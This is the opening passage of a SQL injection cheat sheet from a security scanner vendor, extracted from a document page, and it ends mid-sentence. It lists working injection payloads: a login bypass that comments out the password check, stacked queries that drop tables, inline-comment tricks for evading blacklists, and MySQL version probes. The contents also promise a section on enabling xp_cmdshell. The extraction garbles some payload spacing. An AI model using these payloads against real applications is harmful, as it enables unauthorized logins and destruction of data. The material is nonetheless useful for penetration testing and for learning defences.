SQL Injection Cheat Sheet

Citation preview

SQL Injection Cheat Sheet

Find and exploit SQL Injections with Netsparker, Next Generation Web Application Security Scanner

SQL Injection Cheat Sheet, Document Version 1.4

About SQL Injection Cheat Sheet Currently only for MySQL and Microsoft SQL Server, some ORACLE and some PostgreSQL. Most of samples are not correct for every single situation. Most of the real world environments may change because of parenthesis, different code bases and unexpected, strange SQL sentences. Samples are provided to allow reader to get basic idea of a potential attack and almost every section includes a brief information about itself. M : MySQL S : SQL Server P : PostgreSQL O : Oracle + : Possibly all other databases Examples;

(MS) means : MySQL and SQL Server etc. (M*S) means : Only in some versions of MySQL or special conditions see related note and SQL Server

Table Of Contents 1. About SQL Injection Cheat Sheet 2. Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks 1. Line Comments SQL Injection Attack Samples 2. Inline Comments Classical Inline Comment SQL Injection Attack Samples MySQL Version Detection Sample Attacks 3. Stacking Queries Language / Database Stacked Query Support Table 1

Stacked SQL Injection Attack Samples 4. If Statements MySQL If Statement SQL Server If Statement If Statement SQL Injection Attack Samples 5. Using Integers 6. String Operations String Concatenation 7. Strings without Quotes Hex based SQL Injection Samples 8. String Modification & Related 9. Union Injections UNION – Fixing Language Issues 10. Bypassing Login Screens 11. Enabling xp_cmdshell in SQL Server 2005 12. Other parts are not so well formatted but check out by yourself, drafts, notes and stuff, scroll down and see.

Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks Ending / Commenting Out / Line Comments

Line Comments Comments out rest of the query. Line comments are generally useful for ignoring rest of the query so you don’t have to deal with fixing the syntax. -- (SM) DROP sampletable;-# (M) DROP sampletable;# Line Comments Sample SQL Injection Attacks

Username: admin'-SELECT * FROM members WHERE username = 'admin'--

' AND password =

'password'

This is going to log you as admin user, because rest of the SQL query will be ignored. Inline Comments Comments out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions. /*Comment Here*/ (SM) DROP/*comment*/sampletable 2

SELECT/*avoid-spaces*/password/**/FROM/**/Members /*! MYSQL Special SQL */ (M) This is a special comment syntax for MySQL. It’s perfect for detecting MySQL version. If you put a code into this comments it’s going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version. SELECT /*!32302 1/0, */ 1 FROM tablename Classical Inline Comment SQL Injection Attack Samples

ID: 10; DROP TABLE members /* Simply get rid of other stuff at the end the of query. Same as 10; DROP TABLE members -SELECT /*!32302 1/0, */ 1 FROM tablename Will throw an divison by 0 error if MySQL version is higher than 3.23.02 MySQL Version Detection Sample Attacks

ID: /*!32302 10*/ ID: 10 You will get the same response if MySQL version is higher than 3.23.02 SELECT /*!32302 1/0, */ 1 FROM tablename Will throw an divison by 0 error if MySQL version is higher than 3.23.02 Stacking Queries

Executing more than one query in one transaction. This is very useful in every injection point, especially in SQL Server back ended applications. ; (S) SELECT * FROM members; DROP members-Ends a query and starts a new one. Language / Database Stacked Query Support Table green: supported, dark gray: not supported, light gray: unknown SQL Server MySQL PostgreSQL ORACLE MS Access ASP ASP.NET PHP Java

3

About MySQL and PHP; To clarify som